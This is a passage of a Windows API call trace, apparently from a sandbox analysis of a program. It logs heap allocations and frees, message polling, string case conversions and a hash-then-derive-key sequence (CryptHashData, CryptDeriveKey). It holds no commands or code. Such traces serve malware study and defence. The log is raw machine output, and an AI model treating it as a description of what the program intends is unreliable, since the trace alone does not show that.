lpMsg=0x8bf3c0) returned 0 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.419] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0256.419] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.420] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.420] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.420] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.420] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.421] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.421] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.421] CryptHashData (hHash=0xaa5860, pbData=0x24b16c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0256.422] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0256.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.422] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.422] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0256.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.423] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.423] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.423] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.423] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.423] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.423] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.423] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.424] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.424] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.424] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.424] CryptDeriveKey (in: hProv=0xad2698, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5820) returned 1 [0256.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.428] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.428] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.428] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.429] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.429] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.429] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.430] HeapFree (in: 